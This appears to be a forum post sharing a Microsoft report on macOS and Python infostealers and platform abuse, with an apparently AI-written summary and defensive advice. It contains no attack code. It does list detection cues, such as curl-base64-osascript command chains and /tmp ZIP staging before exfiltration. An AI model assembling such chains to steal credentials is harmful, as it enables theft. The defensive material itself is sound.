Malware News Infostealers without borders: macOS, Python stealers, and platform abuse (A report by Microsoft)

[Khushal]

Content source

https://www.microsoft.com/en-us/security/blog/2026/02/02/infostealers-without-borders-macos-python-stealers-and-platform-abuse/

Infostealers without borders: macOS, Python stealers, and platform abuse | Microsoft Security Blog

How modern infostealers target macOS systems, leverage Python‑based stealers, and abuse trusted platforms and utilities to distribute credential‑stealing payloads.

www.microsoft.com

Infostealer threats are rapidly expanding beyond traditional Windows-focused campaigns, increasingly targeting macOS environments, leveraging cross-platform languages such as Python, and abusing trusted platforms and utilities to silently deliver credential-stealing malware at scale. Since late 2025, Microsoft Defender Experts has observed macOS targeted infostealer campaigns using social engineering techniques—including ClickFix-style prompts and malicious DMG installers—to deploy macOS-specific infostealers such as DigitStealer, MacSync, and Atomic macOS Stealer (AMOS).

These campaigns leverage fileless execution, native macOS utilities, and AppleScript automation to harvest credentials, session data, secrets from browsers, keychains, and developer environments. Simultaneously, Python-based stealers are being leveraged by attackers to rapidly adapt, reuse code, and target heterogeneous environments with minimal overhead. Other threat actors are abusing trusted platforms and utilities—including WhatsApp and PDF converter tools—to distribute malware like Eternidade Stealer and gain access to financial and cryptocurrency accounts.

 

[Bot]

This Microsoft write-up (published February 2, 2026) is essentially a reminder that “infostealers” are no longer a Windows-only problem: attackers are actively targeting macOS users, using cross-platform malware (notably Python), and abusing trusted delivery channels to blend in. ([microsoft.com](https://www.microsoft.com/en-us/security/blog/2026/02/02/infostealers-without-borders-macos-python-stealers-and-platform-abuse/))

What’s notable in the report

• macOS delivery is often “user-assisted” via malvertising/SEO poisoning and fake sites that either push a malicious DMG or use “ClickFix”-style tricks to get the victim to copy/paste commands into Terminal. ([microsoft.com](https://www.microsoft.com/en-us/security/blog/2026/02/02/infostealers-without-borders-macos-python-stealers-and-platform-abuse/))
• Microsoft highlights macOS stealer campaigns they observed since late 2025, including DigitStealer, MacSync, and Atomic macOS Stealer (AMOS), aimed at stealing browser credentials/session data, wallet data, and developer/cloud secrets. ([microsoft.com](https://www.microsoft.com/en-us/security/blog/2026/02/02/infostealers-without-borders-macos-python-stealers-and-platform-abuse/))
• Python stealers are being distributed via phishing and can be adapted quickly; Microsoft specifically discusses PXA Stealer activity observed in 2025, including persistence and exfiltration patterns. ([microsoft.com](https://www.microsoft.com/en-us/security/blog/2026/02/02/infostealers-without-borders-macos-python-stealers-and-platform-abuse/))
• “Platform abuse” is a major theme: the post describes campaigns leveraging WhatsApp (including automated propagation) and a trojanized “Crystal PDF” installer to spread stealers and harvest browser data. ([microsoft.com](https://www.microsoft.com/en-us/security/blog/2026/02/02/infostealers-without-borders-macos-python-stealers-and-platform-abuse/))

Practical defensive takeaways (home + SMB + enterprise)

• Treat “copy/paste this in Terminal to fix/verify” as a red flag. That specific interaction pattern is repeatedly abused in these macOS campaigns. ([microsoft.com](https://www.microsoft.com/en-us/security/blog/2026/02/02/infostealers-without-borders-macos-python-stealers-and-platform-abuse/))
• Avoid unsigned/untrusted DMGs and “fix tools”; stick to official vendor sources and reputable app stores where possible. ([microsoft.com](https://www.microsoft.com/en-us/security/blog/2026/02/02/infostealers-without-borders-macos-python-stealers-and-platform-abuse/))
• Monitor/alert on suspicious macOS command chains (Defender specifically calls out flows involving curl, base64 decoding, gunzip, osascript, and JXA), and watch for fileless/in-memory pipelines. ([microsoft.com](https://www.microsoft.com/en-us/security/blog/2026/02/02/infostealers-without-borders-macos-python-stealers-and-platform-abuse/))
• Watch egress + staging behaviors (e.g., unusual POSTs to suspicious/newly-registered domains; transient ZIP creation under /tmp followed by exfil). ([microsoft.com](https://www.microsoft.com/en-us/security/blog/2026/02/02/infostealers-without-borders-macos-python-stealers-and-platform-abuse/))
• On Windows-managed environments, Microsoft reiterates hardening items like cloud-delivered protection, EDR in block mode, SmartScreen, tamper protection, and ASR rules (block obfuscated scripts, block low-prevalence executables, block JS/VBS launching downloaded executables). ([microsoft.com](https://www.microsoft.com/en-us/security/blog/2026/02/02/infostealers-without-borders-macos-python-stealers-and-platform-abuse/))

If someone suspects they ran a stealer
Because stealers commonly take passwords and session cookies/tokens, the usual safe play is: isolate the device, then from a known-clean device rotate passwords and revoke active sessions/tokens for email/banking/social/cloud/dev platforms; also rotate developer keys (SSH keys, cloud access keys) and crypto wallet secrets if applicable. Microsoft explicitly frames these campaigns as leading to account takeover and downstream business-impact scenarios. ([microsoft.com](https://www.microsoft.com/en-us/security/blog/2026/02/02/infostealers-without-borders-macos-python-stealers-and-platform-abuse/))

Sources

• Infostealers without borders: macOS, Python stealers, and platform abuse | Microsoft Security Blog